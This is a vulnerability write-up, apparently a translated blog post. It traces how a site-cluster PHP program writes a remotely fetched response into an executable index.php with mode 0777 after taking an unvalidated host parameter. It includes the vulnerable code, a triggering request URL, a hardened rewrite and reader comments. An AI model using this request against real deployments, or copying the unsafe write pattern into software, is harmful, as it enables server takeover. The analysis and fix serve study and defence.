泛站群漏洞可Getshell

From the above, the $sprocket_wheel_links variable is user-controllable and is processed by the strCut function, so let's trace strCut:

```php
// strCut from the site-cluster source: extracts the substring between $StartStr and $EndStr.
function strCut($strContent, $StartStr, $EndStr, $CutType = 2)
{
    $s1 = 0;
    $s2 = 0;
    $cutStr = "";
    switch ($CutType) {
        case 1:
            // Keep the delimiters: start at $StartStr, end just after $EndStr.
            $s1 = strpos($strContent, $StartStr);
            if ($s1 === false) $s1 = 0;
            $s2 = strpos($strContent, $EndStr, $s1) + strlen($EndStr);
            break;
        case 2:
            // Drop the delimiters: start just after $StartStr, end right before $EndStr.
            $s1 = strpos($strContent, $StartStr);
            if ($s1 === false) $s1 = 0;
            else $s1 += strlen($StartStr);
            $s2 = strpos($strContent, $EndStr, $s1);
            break;
    }
    $cutStr = substr($strContent, $s1, $s2 - $s1);
    return $cutStr;
}
```

It is a plain substring extraction with no filtering at all. However, every file generated through this path has a name ending in .txt, so I dropped that route and looked at /pic/index.php instead:

```php
// Fragment from /pic/index.php; the head of the enclosing if block is not reproduced in the post.
    for ($i = 0; $i < count($Branch_directory); $i++) {
        $check = CFolder("./" . $Branch_directory[$i] . "/");
        if ($check == 1) {
            // Write the generated content into each branch directory's index.php.
            WriteIn("./" . $Branch_directory[$i] . "/index.php", $NewFile_content);
        }
    }
    WriteIn("./index.php", $Content_mb);
    chmod("index.php", 0777);
    echo "";
    exit();
} else {
    // Fetch the template from the remote server and write it straight into index.php.
    $Content_mb = GetHtml($Remote_server . "/index.php?type=index.php&host=" . $host_name);
    WriteIn("./index.php", $Content_mb);
    chmod("index.php", 0777);
    header("Location: index.php");
    exit();
}
```

The interesting line is WriteIn("./index.php",$Content_mb): the target file ends in .php and its content is $Content_mb. Following $Content_mb:

```php
$Content_mb = GetHtml($Remote_server . "/index.php?type=index.php&host=" . $host_name);
```

It fetches the index.php mentioned earlier from the remote server and passes host along. So if PHP code ends up in the response to

```php
$Remote_server . "/index.php?type=index.php&host=" . $host_name
```

it gets written into index.php and executed. Hence the constructed request:

```php
http://localhost/fanzhan/?host=http://baidu.com/
```
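The root cause is that a request-controlled value ($host_name) is forwarded unvalidated and the fetched remote response is written into a file PHP will execute, with mode 0777 on top. Below is an added hardened rewrite of that generation step, not code from the site-cluster project; the function names, the placeholder template server and the choice of a static index.html are assumptions for illustration.

```php
<?php
// Added hardening example (not the original site-cluster code).
// Function names and the template-server URL below are assumptions.

// Accept only a bare hostname: DNS labels of letters, digits and hyphens joined by dots.
// A full URL, a path or anything containing "<?php" is rejected rather than forwarded.
function validateHostName($host)
{
    $host = strtolower(trim((string) $host));
    if ($host === '' || strlen($host) > 253) {
        return null;
    }
    $label = '(?!-)[a-z0-9-]{1,63}(?<!-)';
    if (!preg_match('/^' . $label . '(\.' . $label . ')+$/', $host)) {
        return null;
    }
    return $host;
}

// Fetch the template with the host name URL-encoded, so it can only travel as a query value.
function fetchTemplate($remoteServer, $host)
{
    $url = $remoteServer . '/index.php?type=index.php&host=' . rawurlencode($host);
    return file_get_contents($url);
}

// Store remote content only as static HTML that PHP never executes, with a restrictive mode
// instead of 0777. Content carrying a PHP open tag is treated as tampering and refused.
function writeStaticPage($dir, $content)
{
    if (strpos($content, '<?') !== false) {
        return false;
    }
    $path = rtrim($dir, '/') . '/index.html';
    if (file_put_contents($path, $content, LOCK_EX) === false) {
        return false;
    }
    return chmod($path, 0644);
}

// Equivalent of the else branch in /pic/index.php, with validation at every step.
$hostName = validateHostName(isset($_GET['host']) ? $_GET['host'] : $_SERVER['HTTP_HOST']);
if ($hostName === null) {
    http_response_code(400);
    exit('invalid host');
}
$remoteServer = 'http://template-server.example'; // placeholder for $Remote_server
$content = fetchTemplate($remoteServer, $hostName);
if ($content === false || !writeStaticPage(__DIR__, $content)) {
    http_response_code(502);
    exit('template unavailable');
}
header('Location: index.html');
exit();
```

With this in place, the request from the post (host=http://baidu.com/) fails the hostname check and is answered with 400, and even a template server that returned PHP source would only ever produce a non-executable index.html.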

3 comments

  1. 456

    Which site-cluster system is this? Long Shao's one?

  2. 123

    Tested, did not work

    1. 小菜
      @123

      Which site-cluster system is it?

Leave a comment